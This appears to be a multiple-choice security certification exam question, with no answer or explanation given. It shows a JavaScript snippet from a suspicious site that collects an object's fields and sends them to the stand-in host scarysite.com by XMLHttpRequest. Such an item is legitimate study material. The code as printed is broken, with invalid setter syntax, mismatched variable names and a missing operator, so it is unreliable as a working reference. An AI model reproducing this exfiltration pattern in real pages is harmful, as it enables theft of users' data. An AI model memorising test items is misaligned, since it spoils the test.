Travis, a senior systems developer for YNY Services, received an email recently from an
unknown source. Instead of opening the email on his normal production machine, Travis decides
to copy the email to a thumb drive and examine it from a quarantined PC not on the network.
Travis examines the email and discovers a link that is supposed to take him to
http://scarysite.com. Travis decides to get back on his production computer and examine the code
of that site.
From the following code snippet, what has Travis discovered?
<script>
function object() {
this.email setter = captureobject
}
function captureobject(x) {
var objstring = “”
for(fld in this) {

obstring += fld + “: “ this[fld] + “, “;
}
obstring += “email: “ + x;
var req = new XMLHttpRequest();
req.open(“GET”, “http://scarysite.com?obj=“ +
escape(objString), true);
req.send(null);
}
</script>

A.
URL obfuscation

B.
XSS attack

C.
JavaScript hijacking

D.
URL tampering

Explanation: